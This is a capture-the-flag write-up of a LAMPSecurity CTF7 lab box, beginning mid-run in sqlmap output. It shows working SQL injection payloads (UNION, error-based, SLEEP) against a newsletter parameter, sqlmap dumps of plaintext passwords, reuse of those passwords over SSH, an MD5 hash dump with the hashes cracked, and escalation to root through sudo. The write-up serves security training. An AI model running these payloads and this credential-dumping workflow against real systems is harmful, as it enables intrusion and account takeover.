[17:50:12] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:50:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[17:50:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[17:50:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[17:50:12] [INFO] testing 'Oracle AND time-based blind'
[17:50:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[17:50:13] [WARNING] URI parameter '#1*' does not seem to be injectable
[17:50:13] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[17:50:13] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3 times

[*] shutting down at 17:50:13


Our second available page under Resources is the Reading Room which provides a few different files for download.

Once we select to download a file, we may notice that the file HTTP parameter used to specify which file to download may be subjectible to some form of LFI vulnerability. Let’s try to break it!

Unfortunately, initial testing for an LFI vulnerability doesn’t amount to much and fimap wasn’t able to locate the prescence of a vulnerability either. Let’s keep searching!

calvinbebop@Dolos:~$ fimap -u '10.0.88.9/read&file=0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf' --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600"
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: '10.0.88.9/read&file=0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf'
[00:12:26] [OUT] Inspecting URL '10.0.88.9/read&file=0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf'...
[00:12:26] [INFO] Fiddling around with URL...
[00:12:26] [WARN] unknown url type: 10.0.88.9/read&file=0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf
Target URL isn't affected by any file inclusion bug :(


The final available page under Resources is the site’s Newsletter section. Right away we can identify that an id HTTP parameter is being used to specify what page to serve. You know the drill, let’s test for some SQL Injection! Adding an apostrophe or semicolon directly after the parameter’s value is often times a decent first test to pick up on a SQL Injection vulnerability. The apostrophe character is used for this test as it is the character limiter in SQL. With it, you may delimit strings therein testing whether or not the strings are correctly escaped in the application.

Peerrrrrfect


SQL Injection Exploitation

After working through some additional manual SQL injection testing, we’re able to verify a SQL Injection vulnerability exists by passing in MySQL’s SLEEP function. In this instance, the function causes the webserver to pause for 10 seconds before returning the blog post.

Passing this URL into sqlmap along with our authenticated cookie header, we are able to find three injection points.

calvinbebop@Dolos:~$ sqlmap -u "http://10.0.88.9/newsletter&id=1" -p id --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:50:46

[17:50:46] [WARNING] you have provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[17:50:48] [INFO] testing connection to the target URL
[17:50:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[17:50:48] [INFO] testing if the target URL content is stable
[17:50:49] [INFO] target URL content is stable
[17:50:49] [INFO] testing if URI parameter '#1*' is dynamic
[17:50:49] [INFO] confirming that URI parameter #1* is dynamic
[17:50:49] [INFO] URI parameter '#1*' is dynamic
[17:50:49] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[17:50:49] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[17:50:49] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:50:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:50:54] [WARNING] reflective value(s) found and filtering out
[17:50:54] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="full")
[17:50:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:50:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:50:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:50:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:50:54] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:50:54] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:50:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:50:54] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[17:50:54] [INFO] testing 'MySQL inline queries'
[17:50:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[17:50:54] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)                                                                                              
[17:50:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:50:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[17:50:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[17:50:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:50:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:50:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[17:51:04] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
[17:51:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:51:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:51:05] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:51:05] [INFO] target URL appears to have 5 columns in query
[17:51:05] [INFO] target URL appears to be UNION injectable with 5 columns
[17:51:05] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://10.0.88.9:80/newsletter&id=1 AND 8679=8679

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://10.0.88.9:80/newsletter&id=1 AND (SELECT 9273 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(9273=9273,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://10.0.88.9:80/newsletter&id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: http://10.0.88.9:80/newsletter&id=-5625 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6b7671,0x69625367416e5364537873696d484b4a5147437a784c454c6f764a6c4c646e6b4c68484c75454c79,0x716a7a7671),NULL-- xngF
---
[17:51:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[17:51:08] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.9'

[*] shutting down at 17:51:08


We’ll now have sqlmap use one of the injection points it previously discovered to return all available databases.

calvinbebop@Dolos:~$ sqlmap -u "http://10.0.88.9/newsletter&id=1" -p id --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600" --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.7#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:59:20

[18:59:20] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:59:23] [INFO] resuming back-end DBMS 'mysql' 
[18:59:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://10.0.88.9:80/newsletter&id=1 AND 8679=8679

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://10.0.88.9:80/newsletter&id=1 AND (SELECT 9273 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(9273=9273,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://10.0.88.9:80/newsletter&id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: http://10.0.88.9:80/newsletter&id=-5625 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6b7671,0x69625367416e5364537873696d484b4a5147437a784c454c6f764a6c4c646e6b4c68484c75454c79,0x716a7a7671),NULL-- xngF
---
[18:59:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
	...shortened for brevity
Database: website
[9 tables]
+---------------------------------------+
| contact                               |
| documents                             |
| hits                                  |
| log                                   |
| newsletter                            |
| payment                               |
| trainings                             |
| trainings_x_users                     |
| users                                 |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: roundcube
[12 tables]
+---------------------------------------+
| session                               |
| cache                                 |
| cache_index                           |
| cache_messages                        |
| cache_thread                          |
| contactgroupmembers                   |
| contactgroups                         |
| contacts                              |
| dictionary                            |
| identities                            |
| searches                              |
| users                                 |
+---------------------------------------+

Database: mysql
[23 tables]
+---------------------------------------+
| user                                  |
| columns_priv                          |
| db                                    |
| event                                 |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| ndb_binlog_index                      |
| plugin                                |
| proc                                  |
| procs_priv                            |
| servers                               |
| slow_log                              |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
+---------------------------------------+

[18:59:43] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2 times
[18:59:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.9'

[*] shutting down at 18:59:43


It looks like sqlmap doesn’t actually have the necessary permissions to access a good number of the tables we previously listed. Fortunately, it was able to retrieve the contents of the log table in the website database:

calvinbebop@Dolos:~$ sqlmap -u "http://10.0.88.9/newsletter&id=1" -p id --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600" --dbms="MySQL" -v 1 --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:21:21

[19:21:21] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[19:21:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://10.0.88.9:80/newsletter&id=1 AND 8679=8679

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://10.0.88.9:80/newsletter&id=1 AND (SELECT 9273 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(9273=9273,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://10.0.88.9:80/newsletter&id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: http://10.0.88.9:80/newsletter&id=-5625 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6b7671,0x69625367416e5364537873696d484b4a5147437a784c454c6f764a6c4c646e6b4c68484c75454c79,0x716a7a7671),NULL-- xngF
---
[19:21:23] [INFO] testing MySQL
[19:21:23] [INFO] confirming MySQL
[19:21:23] [WARNING] reflective value(s) found and filtering out
[19:21:23] [INFO] the back-end DBMS is MySQL

	...shortened for brevity

[19:22:40] [INFO] fetching entries for table 'log' in database 'website'
[19:22:40] [INFO] used SQL query returns 5 entries
[19:22:40] [INFO] retrieved: "1","User test@nowhere.com registered with id 113 and password test"
[19:22:40] [INFO] retrieved: "2","User ruby@localhost.localdomain reset their password to Shelly2012"
[19:22:40] [INFO] retrieved: "3","User ruby@localhost.localdomain logged into the admin site."
[19:22:40] [INFO] retrieved: "4","User charles@localhost.localdomain used recovery.  Their password rest to changeme"
[19:22:40] [INFO] retrieved: "5","User calvinbebop@gmail.com registered with id 114 and password password1"

Sqlmap was then able to dump the following user information

Database: website                                                                                                                                                                                          
Table: log
[5 entries]
+----+------------------------------------------------------------------------------------+
| id | message                                                                            |
+----+------------------------------------------------------------------------------------+
| 1  | User test@nowhere.com registered with id 113 and password test                     |
| 2  | User ruby@localhost.localdomain reset their password to Shelly2012                 |
| 3  | User ruby@localhost.localdomain logged into the admin site.                        |
| 4  | User charles@localhost.localdomain used recovery.  Their password rest to changeme |
| 5  | User calvinbebop@gmail.com registered with id 114 and password password1           |
+----+------------------------------------------------------------------------------------+

Low Privilege Access / Local Enumeration/Exploit Attempt #1

We are now able access the CTF7 box over SSH (22/TCP) using ruby’s user account with the password we dumped from the log file.

calvinbebop@Dolos:~$ ssh ruby@10.0.88.9
The authenticity of host '10.0.88.9 (10.0.88.9)' can't be established.
RSA key fingerprint is SHA256:GfrI8RJ0/Xy8Za7qDP9Gm+RaoxuVz1GWo15hvn8+rdI.
Are you sure you want to continue connecting (yes/no)? yes  
Warning: Permanently added '10.0.88.9' (RSA) to the list of known hosts.
ruby@10.0.88.9's password: 
Last login: Sun Dec 23 20:32:41 2012 from 192.168.1.135
[ruby@localhost ~]$

Right off the bat, we can check and see that ruby’s user account does not have access to the root account via sudo. This means we’ll have to look elsewhere and try to find a way into another user’s account since ruby’s doesn’t have the permissions we require.

[ruby@localhost ~]$ sudo su
[sudo] password for ruby: 
ruby is not in the sudoers file.  This incident will be reported.

Digging into ruby’s home folder, her bash history file clues us to the fact that the local MySQL database may be accessible via the root account without a password.

[ruby@localhost ~]$ cd /home/ruby/
[ruby@localhost ~]$ ls -lsa
total 36
4 drwx------.  4 ruby ruby 4096 Dec 23  2012 .
4 drwxr-xr-x. 13 root root 4096 Dec 19  2012 ..
4 -rw-------.  1 ruby ruby  112 Dec 23  2012 .bash_history
4 -rw-r--r--.  1 ruby ruby   18 May 10  2012 .bash_logout
4 -rw-r--r--.  1 ruby ruby  176 May 10  2012 .bash_profile
4 -rw-r--r--.  1 ruby ruby  124 May 10  2012 .bashrc
4 drwx------.  3 ruby ruby 4096 Dec 19  2012 mail
4 drwx------.  2 ruby ruby 4096 Dec 19  2012 Maildir
4 -rw-------.  1 ruby ruby   38 Dec 23  2012 .mysql_history
[ruby@localhost ~]$ cat .bash_history 
sudo su
ls /var/www/html
ls /var/www/html/inc
cat /var/www/html/inc/db.php 
mysql -u root website
su julia
exit

Not only are we able to confirm access via the root account, but we are also able to dump the users table and retrieve a plethora of password hashes!

[ruby@localhost ~]$ mysql -u root website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 13050
Server version: 5.1.66 Source distribution

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| roundcube          |
| website            |
+--------------------+
4 rows in set (0.00 sec)

mysql> SHOW TABLES;
+-------------------+
| Tables_in_website |
+-------------------+
| contact           |
| documents         |
| hits              |
| log               |
| newsletter        |
| payment           |
| trainings         |
| trainings_x_users |
| users             |
+-------------------+
9 rows in set (0.00 sec)

mysql> select username,password from users;
+-------------------------------+----------------------------------+
| username                      | password                         |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| calvinbebop@gmail.com         | 7c6a180b36896a0a8c02787eeafb0e4c |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
13 rows in set (0.00 sec)

Hash Identification/Cracking

Using Hash-identifier (or an equivalent online tool), we’re able to determine that these are MD5 hashed strings.

calvinbebop@Dolos:~$ hash-identifier 
   #########################################################################
   #	 __  __ 		    		__		 	 ______    _____	       #
   #	/\ \/\ \		   		   /\ \ 		/\__  _\  /\  _ `\	       #
   #	\ \ \_\ \     __      ____ \ \ \___		\/_/\ \/  \ \ \/\ \	       #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R 							   #
   #							www.Blackploit.com 						   #
   #						       Root@Blackploit.com  				   #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: e22f07b17f98e0d9d364584ced0e3c18

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Luckily for us, MD5 hashes are relatively easy to crack and numerous online sources are happy to provide the “decrypted” strings for provided hashes.

Hash Type Result
e22f07b17f98e0d9d364584ced0e3c18 md5 my2cents
0d9ff2a4396d6939f80ffe09b1280ee1 md5 transformersrule
2146bf95e8929874fc63d54f50f1d2e3 md5 turtles77
9f80ec37f8313728ef3e2f218c79aa23 md5 Not found.
5d93ceb70e2bf5daa84ec3d0cd2c731a md5 qwer1234
ed2539fe892d2c52c42a440354e8e3d5 md5 madrid
9c42a1346e333a770904b2a2b37fa7d3 md5 somepassword
3a24d81c2b9d0d9aaf2f10c6c9757d4e md5 LosAngelesLakers
4773408d5358875b3764db552a29ca61 md5 Not found.
b2a97bcecbd9336b98d59d9324dae5cf md5 chuck33
4cb9c8a8048fd02294477fcb1a41191a md5 changeme
7c6a180b36896a0a8c02787eeafb0e4c md5 password1
098f6bcd4621d373cade4e832627b4f6 md5 test

SSH Access (22/TCP) via Compromised Credentials

Using one of our newfound set of credentials, we were able to login and obtain root privileges via brian’s user account using the password my2cents.

calvinbebop@Dolos:~$ @Dolos:~# ssh brian@10.0.88.9
brian@10.0.88.9's password: 
[brian@localhost ~]$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for brian: 
[root@localhost brian]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost brian]#


EOL

Thank you for partaking in this week’s boot2root of LAMPSecurity’s CTF7 box! Another brilliant showcasing of the impact that MySQL misconfigurations can have.
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!